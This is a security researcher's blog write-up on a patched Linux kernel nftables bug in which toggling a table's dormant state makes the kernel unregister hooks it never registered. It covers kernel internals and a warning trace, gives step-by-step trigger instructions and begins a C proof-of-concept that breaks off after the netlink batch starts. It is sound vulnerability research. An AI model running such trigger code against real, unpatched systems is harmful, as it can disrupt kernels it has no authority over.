nftables Adventures: An Introduction to Bug Hunting and the Dormant State Bug [Part 1] - Wed, Sep 27, 2023
TLDR
I tried my hand at bug hunting within the nftables subsystem in the Linux kernel, and managed to find a bug where, if the dormant state of a table was toggled in a certain way, the kernel would attempt to deactivate hooks that were never activated in the first place. The bug report can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1. Unfortunately (or fortunately), the bug cannot be transformed into a UAF, as the kernel performs certain checks that prevent us from reaching any interesting frees.
This is going to be a more rambly writeup where I will talk about my experiences and thought processes while bug hunting in addition to explaining the root cause of the bug; if you would like to read a more official and concise version, check out this link: https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation/. Otherwise, gather ‘round the nftable; let’s go on an adventure!
nfTable of Contents
- Introduction to nftables
- nftables Dormant State Chain Hook Deactivation Bug
- Triggering the Bug
- Patch Analysis
- My Bug Hunting Experience
- References and Credits
Introduction to nftables
nftables is a modern packet filtering framework that aims to replace the legacy {ip,ip6,arp,eb}_tables (xtables) infrastructure. It reuses the existing netfilter hooks, which act as entry points for handlers that perform various operations on packets. Nftables table objects contain a list of chain objects, which contain a list of rule objects, which finally contain expressions, which perform the operations of the pseudo-state machine.
Tables
Tables are top-level objects which contain chains, sets, objects and flowtables. Internally, tables are represented by struct nft_table.
/**
 * struct nft_table - nf_tables table
 *
 * @list: used internally
 * @chains_ht: chains in the table
 * @chains: same, for stable walks
 * @sets: sets in the table
 * @objects: stateful objects in the table
 * @flowtables: flow tables in the table
 * @hgenerator: handle generator state
 * @handle: table handle
 * @use: number of chain references to this table
 * @flags: table flag (see enum nft_table_flags)
 * @genmask: generation mask
 * @afinfo: address family info
 * @name: name of the table
 * @validate_state: internal, set when transaction adds jumps
 */
struct nft_table {
    struct list_head list;
    struct rhltable chains_ht;
    struct list_head chains;
    struct list_head sets;
    struct list_head objects;
    struct list_head flowtables;
    u64 hgenerator;
    u64 handle;
    u32 use;
    u16 family:6,
        flags:8,
        genmask:2;
    u32 nlpid;
    char *name;
    u16 udlen;
    u8 *udata;
    u8 validate_state;
};
A table can have multiple flags. The user is able to set the flags NFT_TABLE_F_DORMANT and/or NFT_TABLE_F_OWNER when the table is created (nf_tables_newtable). The dormant state flag (NFT_TABLE_F_DORMANT) can be updated in nf_tables_updtable. If NFT_TABLE_F_DORMANT (0x1) is set, the table will be made dormant, and all its basechain hooks will be unregistered, but the table will not be deleted. There are also internally set __NFT_TABLE_F_UPDATE flags, which comprise __NFT_TABLE_F_WAS_AWAKEN and __NFT_TABLE_F_WAS_DORMANT.
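To make the flag layout concrete, here is a minimal userspace sketch of how the user-visible and internal table flags can be tested. The numeric values reflect my reading of the kernel headers around v6.5 and should be treated as assumptions; the helpers table_is_dormant, table_update_pending and demo_table_flags are hypothetical names, not kernel functions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* User-settable table flags (values assumed from the uapi header). */
#define NFT_TABLE_F_DORMANT 0x1u
#define NFT_TABLE_F_OWNER   0x2u
#define NFT_TABLE_F_MASK    (NFT_TABLE_F_DORMANT | NFT_TABLE_F_OWNER)

/* Internal flags: assumed to occupy the first bits above the user mask. */
#define __NFT_TABLE_F_INTERNAL    (NFT_TABLE_F_MASK + 1)
#define __NFT_TABLE_F_WAS_DORMANT (__NFT_TABLE_F_INTERNAL << 0)
#define __NFT_TABLE_F_WAS_AWAKEN  (__NFT_TABLE_F_INTERNAL << 1)
#define __NFT_TABLE_F_UPDATE \
    (__NFT_TABLE_F_WAS_DORMANT | __NFT_TABLE_F_WAS_AWAKEN)

/* Hypothetical helper: is the table currently dormant? */
static inline bool table_is_dormant(uint16_t flags)
{
    return (flags & NFT_TABLE_F_DORMANT) != 0;
}

/* Hypothetical helper: was the dormant state already toggled in this batch? */
static inline bool table_update_pending(uint16_t flags)
{
    return (flags & __NFT_TABLE_F_UPDATE) != 0;
}

/* Small self-check showing how the bits combine. */
static inline void demo_table_flags(void)
{
    uint16_t flags = NFT_TABLE_F_DORMANT | __NFT_TABLE_F_WAS_AWAKEN;

    assert(table_is_dormant(flags));
    assert(table_update_pending(flags));
    assert(!table_update_pending(NFT_TABLE_F_OWNER));
}
```

The point to notice is that the "update" flags are bookkeeping bits that live in the same flags field as the dormant bit, which is what makes the interaction between them matter later on.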
Chains
Chains can either be base chains, which are registered with a netfilter hook and cannot be jumped to, or normal chains, which are not registered with a hook but can be jumped to. Internally, chains are represented by struct nft_chain.
/**
 * struct nft_chain - nf_tables chain
 *
 * @rules: list of rules in the chain
 * @list: used internally
 * @rhlhead: used internally
 * @table: table that this chain belongs to
 * @handle: chain handle
 * @use: number of jump references to this chain
 * @flags: bitmask of enum nft_chain_flags
 * @name: name of the chain
 */
struct nft_chain {
    struct nft_rule_blob __rcu *blob_gen_0;
    struct nft_rule_blob __rcu *blob_gen_1;
    struct list_head rules;
    struct list_head list;
    struct rhlist_head rhlhead;
    struct nft_table *table;
    u64 handle;
    u32 use;
    u8 flags:5,
       bound:1,
       genmask:2;
    char *name;
    u16 udlen;
    u8 *udata;
    /* Only used during control plane commit phase: */
    struct nft_rule_blob *blob_next;
};
Basechains are represented by struct nft_base_chain.
/**
 * struct nft_base_chain - nf_tables base chain
 *
 * @ops: netfilter hook ops
 * @hook_list: list of netfilter hooks (for NFPROTO_NETDEV family)
 * @type: chain type
 * @policy: default policy
 * @stats: per-cpu chain stats
 * @chain: the chain
 * @flow_block: flow block (for hardware offload)
 */
struct nft_base_chain {
    struct nf_hook_ops ops;
    struct list_head hook_list;
    const struct nft_chain_type *type;
    u8 policy;
    u8 flags;
    struct nft_stats __percpu *stats;
    struct nft_chain chain;
    struct flow_block flow_block;
};
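Note that struct nft_base_chain embeds a struct nft_chain rather than pointing to one. A rough userspace sketch of how code holding only the inner chain pointer can get back to the enclosing base chain is shown below. The structures are trimmed-down stand-ins, the NFT_CHAIN_BASE value is assumed from the uapi header, and container_of_model, chain_is_base, to_base_chain and demo_base_chain are hypothetical names for this illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define NFT_CHAIN_BASE 0x1u /* assumed value of the base-chain flag */

/* Trimmed-down stand-in for struct nft_chain. */
struct chain_model {
    uint8_t flags;
    const char *name;
};

/* Trimmed-down stand-in for struct nft_base_chain. */
struct base_chain_model {
    unsigned int hooknum;       /* stands in for struct nf_hook_ops */
    uint8_t policy;
    struct chain_model chain;   /* embedded, not a pointer */
};

/* Userspace equivalent of the container_of idiom. */
#define container_of_model(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Only chains carrying the base flag are embedded in a base chain. */
static inline bool chain_is_base(const struct chain_model *c)
{
    return (c->flags & NFT_CHAIN_BASE) != 0;
}

/* Recover the enclosing base chain; only valid if chain_is_base(c). */
static inline struct base_chain_model *to_base_chain(struct chain_model *c)
{
    return container_of_model(c, struct base_chain_model, chain);
}

static inline void demo_base_chain(void)
{
    struct base_chain_model bc = {
        .hooknum = 3,
        .chain = { .flags = NFT_CHAIN_BASE, .name = "chain1" },
    };
    struct chain_model *c = &bc.chain;

    assert(chain_is_base(c));
    assert(to_base_chain(c) == &bc);
}
```

Calling to_base_chain on a normal chain would compute a pointer into unrelated memory, which is why the flag check has to come first.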
Rules
Rules contain nftables expressions. Internally, rules are represented by struct nft_rule.
/**
 * struct nft_rule - nf_tables rule
 *
 * @list: used internally
 * @handle: rule handle
 * @genmask: generation mask
 * @dlen: length of expression data
 * @udata: user data is appended to the rule
 * @data: expression data
 */
struct nft_rule {
    struct list_head list;
    u64 handle:42,
        genmask:2,
        dlen:12,
        udata:1;
    unsigned char data[]
        __attribute__((aligned(__alignof__(struct nft_expr))));
};
Expressions
Expressions act as the operations of the state machine. There are many expressions; here are some examples:
- Bitwise: Performs bitwise operations
- Immediate: To load data into registers. Also allows for jumps/goto to another normal chain
- Byteorder: To change from host/network endianness
- Compare: To compare a register value against a constant
- Counter: To enable counters in rules
Internally, expressions are represented by struct nft_expr.
/**
 * struct nft_expr - nf_tables expression
 *
 * @ops: expression ops
 * @data: expression private data
 */
struct nft_expr {
    const struct nft_expr_ops *ops;
    unsigned char data[]
        __attribute__((aligned(__alignof__(u64))));
};
Each expression also has a struct nft_expr_ops representing various operations.
/**
 * struct nft_expr_ops - nf_tables expression operations
 *
 * @eval: Expression evaluation function
 * @size: full expression size, including private data size
 * @init: initialization function
 * @activate: activate expression in the next generation
 * @deactivate: deactivate expression in next generation
 * @destroy: destruction function, called after synchronize_rcu
 * @dump: function to dump parameters
 * @type: expression type
 * @validate: validate expression, called during loop detection
 * @data: extra data to attach to this expression operation
 */
struct nft_expr_ops {
    void (*eval)(const struct nft_expr *expr,
                 struct nft_regs *regs,
                 const struct nft_pktinfo *pkt);
    int (*clone)(struct nft_expr *dst,
                 const struct nft_expr *src);
    unsigned int size;
    int (*init)(const struct nft_ctx *ctx,
                const struct nft_expr *expr,
                const struct nlattr * const tb[]);
    void (*activate)(const struct nft_ctx *ctx,
                     const struct nft_expr *expr);
    void (*deactivate)(const struct nft_ctx *ctx,
                       const struct nft_expr *expr,
                       enum nft_trans_phase phase);
    void (*destroy)(const struct nft_ctx *ctx,
                    const struct nft_expr *expr);
    void (*destroy_clone)(const struct nft_ctx *ctx,
                          const struct nft_expr *expr);
    int (*dump)(struct sk_buff *skb,
                const struct nft_expr *expr,
                bool reset);
    int (*validate)(const struct nft_ctx *ctx,
                    const struct nft_expr *expr,
                    const struct nft_data **data);
    bool (*reduce)(struct nft_regs_track *track,
                   const struct nft_expr *expr);
    bool (*gc)(struct net *net,
               const struct nft_expr *expr);
    int (*offload)(struct nft_offload_ctx *ctx,
                   struct nft_flow_rule *flow,
                   const struct nft_expr *expr);
    bool (*offload_action)(const struct nft_expr *expr);
    void (*offload_stats)(struct nft_expr *expr,
                          const struct flow_stats *stats);
    const struct nft_expr_type *type;
    void *data;
};
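To give a feel for how the eval callback drives the "state machine", here is a toy userspace model of a rule being evaluated as a sequence of expressions over a small register file. It is a simplified sketch, not the kernel's evaluation loop: every type and function name ending in _model, the three example ops, and the "break" flag are assumptions made for illustration, and register indices are not bounds-checked.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_NREGS 4

struct regs_model {
    uint32_t data[MODEL_NREGS];
    bool brk;   /* set by an expression to stop evaluating the rule */
};

struct expr_model;

struct expr_ops_model {
    void (*eval)(const struct expr_model *expr, struct regs_model *regs);
};

struct expr_model {
    const struct expr_ops_model *ops;
    uint32_t sreg, dreg, value;
};

/* "immediate": load a constant into a register. */
static void immediate_eval(const struct expr_model *e, struct regs_model *r)
{
    r->data[e->dreg] = e->value;
}

/* "bitwise": AND a source register with a constant mask. */
static void bitwise_and_eval(const struct expr_model *e, struct regs_model *r)
{
    r->data[e->dreg] = r->data[e->sreg] & e->value;
}

/* "compare": stop the rule unless the register equals the constant. */
static void cmp_eq_eval(const struct expr_model *e, struct regs_model *r)
{
    if (r->data[e->sreg] != e->value)
        r->brk = true;
}

static const struct expr_ops_model immediate_ops = { .eval = immediate_eval };
static const struct expr_ops_model bitwise_and_ops = { .eval = bitwise_and_eval };
static const struct expr_ops_model cmp_eq_ops = { .eval = cmp_eq_eval };

/* Run every expression in order; returns true if none of them broke out. */
static inline bool rule_eval(const struct expr_model *exprs, size_t n,
                             struct regs_model *regs)
{
    regs->brk = false;
    for (size_t i = 0; i < n; i++) {
        exprs[i].ops->eval(&exprs[i], regs);
        if (regs->brk)
            return false;
    }
    return true;
}

static inline void demo_rule_eval(void)
{
    const struct expr_model rule[] = {
        { .ops = &immediate_ops, .dreg = 0, .value = 0xabcd },
        { .ops = &bitwise_and_ops, .sreg = 0, .dreg = 1, .value = 0xff },
        { .ops = &cmp_eq_ops, .sreg = 1, .value = 0xcd },
    };
    struct regs_model regs = {0};

    assert(rule_eval(rule, 3, &regs));
    assert(regs.data[1] == 0xcd);
}
```

Each expression only sees the shared registers, so a rule is effectively a tiny program whose instructions are dispatched through the ops pointer.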
Genmask System
Many nftables objects have a 2-bit genmask, which specifies whether an object is active in the current and/or next generation. If a bit is set, the object is not active in that generation. There is an overall gencursor defining which bit represents the current generation. Objects can have the following states:
- Active in both the current and next generation (e.g. unchanged objects)
- Active in the current generation, inactive in the next generation (e.g. objects marked for deletion)
- Inactive in the current generation, active in the next generation (e.g. newly created objects)
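The three states above can be sketched with a small userspace model of the genmask. This is an approximation written for illustration, assuming a gencursor that is either 0 or 1; the struct and function names (net_model, obj_model, activate_next and so on) are hypothetical and only loosely follow the kernel helpers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

struct net_model { unsigned int gencursor; };   /* 0 or 1 */
struct obj_model { uint8_t genmask; };          /* only 2 bits are used */

static inline uint8_t genmask_cur(const struct net_model *net)
{
    return (uint8_t)(1u << net->gencursor);
}

static inline uint8_t genmask_next(const struct net_model *net)
{
    return (uint8_t)(1u << (net->gencursor ^ 1u));
}

/* A set bit means "inactive in that generation". */
static inline bool is_active(const struct net_model *net,
                             const struct obj_model *obj)
{
    return (obj->genmask & genmask_cur(net)) == 0;
}

static inline bool is_active_next(const struct net_model *net,
                                  const struct obj_model *obj)
{
    return (obj->genmask & genmask_next(net)) == 0;
}

/* Newly created object: inactive now, active in the next generation. */
static inline void activate_next(const struct net_model *net,
                                 struct obj_model *obj)
{
    obj->genmask = genmask_cur(net);
}

/* Object marked for deletion: active now, inactive in the next generation. */
static inline void deactivate_next(const struct net_model *net,
                                   struct obj_model *obj)
{
    obj->genmask = genmask_next(net);
}

/* Commit: the next generation becomes the current one. */
static inline void bump_generation(struct net_model *net)
{
    net->gencursor ^= 1u;
}

/* After a commit, clear the stale bit so the object is active in both. */
static inline void clear_stale(const struct net_model *net,
                               struct obj_model *obj)
{
    obj->genmask &= (uint8_t)~genmask_next(net);
}

static inline void demo_genmask(void)
{
    struct net_model net = { .gencursor = 0 };
    struct obj_model obj = { .genmask = 0 };

    activate_next(&net, &obj);              /* newly created */
    assert(!is_active(&net, &obj) && is_active_next(&net, &obj));

    bump_generation(&net);                  /* commit */
    assert(is_active(&net, &obj));

    clear_stale(&net, &obj);                /* now active in both */
    assert(is_active(&net, &obj) && is_active_next(&net, &obj));
}
```

Flipping a single cursor bit is what lets a whole batch of changes become visible at once without touching each object at the moment of the switch.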
Control Plane, Transaction System and Transaction Worker
In nftables, actions requested by userspace (via a netlink message) are performed in the control plane, which includes functions such as nf_tables_newtable, nf_tables_updtable, nf_tables_newchain and more. The control plane is in charge of the creation and allocation of objects, activating/deactivating objects in the next generation, linking objects, and modifying the “use” refcount of objects. However, newly created objects are not immediately activated after creation; they are only activated in the commit phase when a new generation is started. All actions in the control plane that involve the creation or updating of objects will add a new transaction to the transaction list.
When a netlink batch transaction is considered to be valid (i.e. no action in the control plane returns an error), the commit phase is entered and nf_tables_commit is called. A new generation will be started, resulting in all newly created objects becoming active, and actions in the transaction list will be performed. The commit phase is also in charge of unlinking objects that are to be deleted, and queuing the asynchronous transaction worker in charge of destroying objects (nf_tables_trans_destroy_work).
The asynchronous transaction worker, when run, will call nft_commit_release, which will finally call functions that will destroy and free objects marked for deletion.
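The control plane / commit split described above can be pictured with a very small userspace model. This is only a sketch of the flow (queue transactions, commit if everything was accepted, hand deletions to a worker); the abort path, the message enum, and all names such as batch_model and process_batch are assumptions made for illustration rather than the kernel's actual data structures.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

enum msg_model { MSG_NEWTABLE, MSG_NEWCHAIN, MSG_DELTABLE };

#define MODEL_MAX_TRANS 16

struct batch_model {
    enum msg_model pending[MODEL_MAX_TRANS];    /* transaction list */
    size_t npending;
    unsigned int generation;    /* bumped on every commit */
    size_t applied;             /* transactions applied by commits */
    size_t destroy_queued;      /* objects handed to the async worker */
};

/* Control plane: validate the request and queue a transaction. */
static inline int control_plane(struct batch_model *b, enum msg_model msg,
                                bool valid)
{
    if (!valid || b->npending == MODEL_MAX_TRANS)
        return -1;
    b->pending[b->npending++] = msg;
    return 0;
}

/* Assumed abort path: an error discards everything queued so far. */
static inline void batch_abort(struct batch_model *b)
{
    b->npending = 0;
}

/* Commit: start a new generation, apply the list, queue deletions. */
static inline void batch_commit(struct batch_model *b)
{
    b->generation++;
    for (size_t i = 0; i < b->npending; i++) {
        b->applied++;
        if (b->pending[i] == MSG_DELTABLE)
            b->destroy_queued++;    /* freed later by the worker */
    }
    b->npending = 0;
}

/* Process a whole batch: commit only if every message was accepted. */
static inline bool process_batch(struct batch_model *b,
                                 const enum msg_model *msgs,
                                 const bool *valid, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (control_plane(b, msgs[i], valid[i]) < 0) {
            batch_abort(b);
            return false;
        }
    }
    batch_commit(b);
    return true;
}

static inline void demo_batch(void)
{
    struct batch_model b = {0};
    const enum msg_model msgs[] = { MSG_NEWTABLE, MSG_NEWCHAIN, MSG_DELTABLE };
    const bool ok[] = { true, true, true };

    assert(process_batch(&b, msgs, ok, 3));
    assert(b.generation == 1 && b.destroy_queued == 1);
}
```

The useful mental picture is that nothing queued in the control plane is final until the commit step runs, and destruction happens even later.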
nftables Dormant State Chain Hook Deactivation Bug
While researching nftables, through manual source code review, I was able to identify a bug that resulted in a warning splat. The bug report can be seen here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1
When a newly created table is updated via nf_tables_updtable from active to dormant, the NFT_TABLE_F_DORMANT flag is set, and as none of the __NFT_TABLE_F_UPDATE flags are set, the __NFT_TABLE_F_WAS_AWAKEN flag will be set as well. When updating a table from active to dormant, the chain hooks are not deactivated until nf_tables_commit is called. However, when a table is updated from dormant to active, the NFT_TABLE_F_DORMANT flag is unset. The function then checks if any of the __NFT_TABLE_F_UPDATE flags are set, and if none are set, the chain hooks are instantly activated by nf_tables_table_enable (i.e. before nf_tables_commit is called). This code behaviour can be seen below:
static int nf_tables_updtable(struct nft_ctx *ctx) {
    ...
    if ((flags & NFT_TABLE_F_DORMANT) &&
        !(ctx->table->flags & NFT_TABLE_F_DORMANT)) {
        ctx->table->flags |= NFT_TABLE_F_DORMANT;
        if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE))
            ctx->table->flags |= __NFT_TABLE_F_WAS_AWAKEN;
    } else if (!(flags & NFT_TABLE_F_DORMANT) &&
               ctx->table->flags & NFT_TABLE_F_DORMANT) {
        ctx->table->flags &= ~NFT_TABLE_F_DORMANT;
        if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE)) {
            ret = nf_tables_table_enable(ctx->net, ctx->table);
            if (ret < 0)
                goto err_register_hooks;
            ctx->table->flags |= __NFT_TABLE_F_WAS_DORMANT;
        }
    }
    ...
}
It is possible to activate/deactivate tables in such a way that, at some point in time, some chains are registered and some are not. This can be done by updating an active table to dormant so that the __NFT_TABLE_F_WAS_AWAKEN flag, which is one of the __NFT_TABLE_F_UPDATE flags, is set, and then updating the dormant table to active. As one of the __NFT_TABLE_F_UPDATE flags is set, nf_tables_table_enable is skipped, leaving some chains unregistered. When an active table is deleted, nf_tables_unregister_hook only checks if the NFT_TABLE_F_DORMANT flag is zeroed out. If the flag is unset, all the base chains are assumed to be active and hence all the chain hooks will be deactivated, even if they were never registered in the first place. This causes the following warning to be displayed:
[ 1411.118307] ------------[ cut here ]------------
[ 1411.119665] hook not found, pf 2 num 3
[ 1411.119708] WARNING: CPU: 1 PID: 367 at net/netfilter/core.c:517 __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.124338] Modules linked in:
[ 1411.125549] CPU: 1 PID: 367 Comm: nft Not tainted 6.5.2 #2
[ 1411.127933] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 1411.130939] RIP: 0010:__nf_unregister_net_hook+0xf8/0x2e0
[ 1411.133576] Code: 01 00 0f 85 90 00 00 00 48 8b 3c 24 c6 05 a5 77 dd 01 01 e8 3a 49 fc fe 8b 53 1c 44 89 e6 48 c7 c7 e0 59 31 83 e8 c8 4c c1 fe <0f> 0b eb 6a 44 89 f8 48 c1 e0 04 4c 01 f0 48 8d 78 08 48 89 44 24
[ 1411.143107] RSP: 0018:ffff8880158f7388 EFLAGS: 00010282
[ 1411.145200] RAX: 0000000000000000 RBX: ffff888006c0f200 RCX: 0000000000000000
[ 1411.147892] RDX: 0000000000000002 RSI: ffffffff8114726f RDI: ffffffff85bd0200
[ 1411.150749] RBP: ffffffff85ffdac0 R08: 0000000000000001 R09: ffffed100da64f01
[ 1411.153231] R10: ffff88806d32780b R11: 0000000000000001 R12: 0000000000000002
[ 1411.156197] R13: ffff888007a4cab8 R14: ffff888007a4ca80 R15: 0000000000000002
[ 1411.159507] FS: 00007f03b7cd5d80(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[ 1411.162667] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1411.164773] CR2: 00007ffc14b40558 CR3: 0000000017ce8000 CR4: 00000000000006e0
[ 1411.169262] Call Trace:
[ 1411.171044] <TASK>
[ 1411.172713] ? __warn+0x9c/0x200
[ 1411.174282] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.176416] ? report_bug+0x1f2/0x220
[ 1411.177947] ? handle_bug+0x3c/0x80
[ 1411.179123] ? exc_invalid_op+0x13/0x40
[ 1411.180361] ? asm_exc_invalid_op+0x16/0x20
[ 1411.181887] ? preempt_count_sub+0xf/0xc0
[ 1411.183772] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.185357] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.187045] nf_tables_commit+0x1a15/0x2600
[ 1411.189373] ? __pfx___nla_validate_parse+0x20/0x20
[ 1411.191535] ? __pfx_lock_release+0x20/0x20
[ 1411.193486] ? __pfx_nf_tables_commit+0x20/0x20
[ 1411.195470] nfnetlink_rcv_batch+0x860/0x1100
[ 1411.197345] ? __pfx_nfnetlink_rcv_batch+0x20/0x20
[ 1411.199436] ? find_held_lock+0x83/0xa0
[ 1411.200948] nfnetlink_rcv+0x1da/0x220
[ 1411.202570] ? __pfx_nfnetlink_rcv+0x20/0x20
[ 1411.204341] ? netlink_deliver_tap+0xf7/0x5e0
[ 1411.206507] netlink_unicast+0x2ca/0x460
[ 1411.208166] ? __pfx_netlink_unicast+0x20/0x20
[ 1411.210278] ? __virt_addr_valid+0xd4/0x160
[ 1411.212405] netlink_sendmsg+0x3d5/0x700
[ 1411.214076] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.215943] ? import_ubuf+0xc1/0x100
[ 1411.217517] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.219358] sock_sendmsg+0xda/0xe0
[ 1411.220915] ? import_iovec+0x54/0x80
[ 1411.222655] ____sys_sendmsg+0x436/0x500
[ 1411.224223] ? __pfx_____sys_sendmsg+0x20/0x20
[ 1411.226046] ? __pfx_copy_msghdr_from_user+0x20/0x20
[ 1411.227928] ? sk_getsockopt+0xbc7/0x1b20
[ 1411.229274] ? find_held_lock+0x83/0xa0
[ 1411.230507] ___sys_sendmsg+0xf8/0x160
[ 1411.231712] ? __pfx____sys_sendmsg+0x20/0x20
[ 1411.233656] ? __pfx_sk_setsockopt+0x20/0x20
[ 1411.235285] ? sock_has_perm+0xc9/0x1a0
[ 1411.236601] ? __fget_light+0xda/0x100
[ 1411.238418] __sys_sendmsg+0xe5/0x180
[ 1411.240445] ? __pfx___sys_sendmsg+0x20/0x20
[ 1411.241861] ? __sys_getsockopt+0x17d/0x1a0
[ 1411.243273] ? syscall_enter_from_user_mode+0x1c/0x60
[ 1411.244890] do_syscall_64+0x3a/0xa0
[ 1411.246060] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
This bug was introduced in the following commit: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=179d9ba5559a756f4322583388b3213fe4e391b0
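The flag handling described in this section can be replayed in userspace with a small model. This is a sketch, not kernel code: it tracks a single base chain, the internal flag values are assumed, the commit step is modeled from my reading of the behaviour described here (hooks disabled at commit if the table is still dormant, update flags cleared), and every name in it (table_model, updtable, delete_table_warns and so on) is hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define F_DORMANT     0x1u  /* models NFT_TABLE_F_DORMANT */
#define F_WAS_DORMANT 0x4u  /* models __NFT_TABLE_F_WAS_DORMANT (assumed) */
#define F_WAS_AWAKEN  0x8u  /* models __NFT_TABLE_F_WAS_AWAKEN (assumed) */
#define F_UPDATE      (F_WAS_DORMANT | F_WAS_AWAKEN)

struct table_model {
    uint16_t flags;
    bool has_basechain;     /* a single base chain keeps the model small */
    bool hook_registered;
};

/* Models nf_tables_table_enable(): register hooks of all base chains. */
static inline void table_enable(struct table_model *t)
{
    if (t->has_basechain)
        t->hook_registered = true;
}

/* Models the pre-patch dormant handling in nf_tables_updtable(). */
static inline void updtable(struct table_model *t, uint16_t new_flags)
{
    if ((new_flags & F_DORMANT) && !(t->flags & F_DORMANT)) {
        t->flags |= F_DORMANT;
        if (!(t->flags & F_UPDATE))
            t->flags |= F_WAS_AWAKEN;
    } else if (!(new_flags & F_DORMANT) && (t->flags & F_DORMANT)) {
        t->flags &= (uint16_t)~F_DORMANT;
        if (!(t->flags & F_UPDATE)) {
            table_enable(t);
            t->flags |= F_WAS_DORMANT;
        }
    }
}

/* A new base chain gets its hook registered only on a non-dormant table. */
static inline void add_basechain(struct table_model *t)
{
    t->has_basechain = true;
    t->hook_registered = !(t->flags & F_DORMANT);
}

/* Assumed commit behaviour: disable hooks if dormant, clear update flags. */
static inline void commit(struct table_model *t)
{
    if (t->flags & F_DORMANT)
        t->hook_registered = false;
    t->flags &= (uint16_t)~F_UPDATE;
}

/* Deleting a non-dormant table unregisters every base chain hook.
 * Returns true if that touches a hook that was never registered. */
static inline bool delete_table_warns(const struct table_model *t)
{
    if (t->flags & F_DORMANT)
        return false;
    return t->has_basechain && !t->hook_registered;
}

static inline bool demo_dormant_bug(void)
{
    struct table_model t = {0};     /* freshly created, active table */

    updtable(&t, F_DORMANT);        /* active -> dormant, WAS_AWAKEN set */
    add_basechain(&t);              /* not registered: table is dormant */
    updtable(&t, 0);                /* dormant -> active, enable skipped */
    commit(&t);
    assert(!(t.flags & F_DORMANT) && !t.hook_registered);
    return delete_table_warns(&t);  /* true: "hook not found" */
}
```

In this model demo_dormant_bug() returns true, mirroring the situation where the table looks active but its base chain hook was never registered.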
Triggering the Bug
To trigger the bug, the following steps should be taken (steps [1] to [4] in the same batch transaction, followed by step [5]):
- Create a table “test_table” – this table is active [1]
- Update the table “test_table” from active to dormant [2]
  a. The NFT_TABLE_F_DORMANT and __NFT_TABLE_F_WAS_AWAKEN table flags are set
- Add a basechain “chain1” – this basechain is added to a dormant table and hence is not registered [3]
- Update the table “test_table” from dormant to active [4]
  a. The NFT_TABLE_F_DORMANT flag is zeroed out, but the __NFT_TABLE_F_WAS_AWAKEN flag is still set, causing nf_tables_table_enable to be skipped
- Delete the active table “test_table” using the nft utility: nft delete table test_table [5]
The table is active when it is deleted, so when the table is being flushed, all the basechains are treated as registered and will be unregistered. However, as basechain “chain1” was never registered, the kernel will try to unregister an unregistered chain, causing a warning.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <signal.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <time.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>

/* Hook number and priority for a base chain */
struct unft_base_chain_param {
    uint32_t hook_num;
    uint32_t prio;
};

/* Allocate a table object with the given name and family */
struct nftnl_table* build_table(const char* name, uint16_t family) {
    struct nftnl_table* t = nftnl_table_alloc();
    nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
    nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
    return t;
}

/* Allocate a chain object; it becomes a base chain if base_param is given */
struct nftnl_chain* build_chain(const char* table_name, const char* chain_name, struct unft_base_chain_param* base_param, uint32_t chain_id) {
    struct nftnl_chain* c;
    c = nftnl_chain_alloc();
    nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
    nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
    if (base_param) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
        nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
    }
    if (chain_id) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_ID, chain_id);
    }
    return c;
}

int main(void) {
    char buf[MNL_SOCKET_BUFFER_SIZE];
    struct nlmsghdr *nlh;
    struct mnl_nlmsg_batch *batch;
    int ret;
    int seq = time(NULL);
    uint8_t family = NFPROTO_IPV4;

    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
    if (nl == NULL) {
        perror("mnl_socket_open");
        exit(EXIT_FAILURE);
    }
    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("mnl_socket_bind");
        exit(EXIT_FAILURE);
    }

    // Start nl message
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
